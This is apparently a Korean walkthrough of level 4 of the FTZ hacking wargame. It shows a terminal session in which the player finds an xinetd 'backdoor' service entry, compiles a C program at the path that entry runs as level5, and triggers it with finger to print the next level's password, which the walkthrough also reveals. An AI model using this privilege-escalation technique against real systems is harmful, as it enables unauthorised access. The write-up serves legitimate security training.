login as: level4
level4@hhytruth's password:
[level4@ftz level4]$ ll
total 12
-rw-r--r--    1 root     root           50 Feb 24  2002 hint
drwxr-xr-x    2 root     level4       4096 Feb 24  2002 public_html
drwxrwxr-x    2 root     level4       4096 Dec 21 11:41 tmp
[level4@ftz level4]$ cat hint


누군가 /etc/xinetd.d/에 백도어를 심어놓았다.!


[level4@ftz level4]$ cd /etc/xinetd.d/
[level4@ftz xinetd.d]$ ls -la
total 88
drwxr-xr-x    2 root     root         4096 Nov 20 21:06 .
drwxr-xr-x   52 root     root         4096 Dec 21 11:40 ..
-r--r--r--    1 root     level4        171 Sep 10  2011 backdoor
-rw-r--r--    1 root     root          560 Dec 19  2007 chargen
-rw-r--r--    1 root     root          580 Dec 19  2007 chargen-udp
-rw-r--r--    1 root     root          417 Dec 19  2007 daytime
-rw-r--r--    1 root     root          437 Dec 19  2007 daytime-udp
-rw-r--r--    1 root     root          339 Dec 19  2007 echo
-rw-r--r--    1 root     root          358 Dec 19  2007 echo-udp
-rw-r--r--    1 root     root          317 Dec 19  2007 finger
-rw-r--r--    1 root     root          273 Dec 19  2007 ntalk
-rw-r--r--    1 root     root          359 Dec 19  2007 rexec
-rw-r--r--    1 root     root          376 Dec 19  2007 rlogin
-rw-r--r--    1 root     root          429 Dec 19  2007 rsh
-rw-r--r--    1 root     root          317 Dec 19  2007 rsync
-rw-r--r--    1 root     root          310 Dec 19  2007 servers
-rw-r--r--    1 root     root          312 Dec 19  2007 services
-rw-r--r--    1 root     root          406 Dec 19  2007 sgi_fam
-rw-r--r--    1 root     root          261 Dec 19  2007 talk
-rw-r--r--    1 root     root          305 Sep 10  2011 telnet
-rw-r--r--    1 root     root          495 Dec 19  2007 time
-rw-r--r--    1 root     root          515 Dec 19  2007 time-udp
[level4@ftz xinetd.d]$ cat ./backdoor		### backdoor 파일내용 출력
service finger
{
        disable = no
        flags           = REUSE
        socket_type     = stream
        wait            = no
        user            = level5
        server          = /home/level4/tmp/backdoor
        log_on_failure  += USERID
}

[level4@ftz xinetd.d]$ cd /home/level4/tmp/backdoor	
### server에 적혀있는 경로로 가본다
-bash: cd: /home/level4/tmp/backdoor: No such file or directory
### 경로에 backdoor 파일이 없다
[level4@ftz xinetd.d]$ cd /home/level4/tmp
[level4@ftz tmp]$ vi backdoor.c	###경로에서 backdoor 프로그램을 만들어준다

#include<stdio.h>
#include<stdlib.h>
int main(void){
        system("my-pass");	### my-pass명령을 실행시키는 파일을 만든다
        return 0;
}
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
:wq	### :wq로 저장후 종료

[level4@ftz tmp]$ gcc -o ./backdoor ./backdoor.c	
### backdoor.c 파일을 backdoor이라는 이름으로 컴파일

[level4@ftz tmp]$ finger @localhost
### finger는 리눅스에서 사용자의 계정정보를 확인하는 명령어
### -$ finger @host명: host명만 적고 user를 명시하지 않으면, 해당서버에 접속해있는 모든 유저의 정보를 출력

^[[H^[[J
Level5 Password is "what is your name?".

[level4@ftz tmp]$

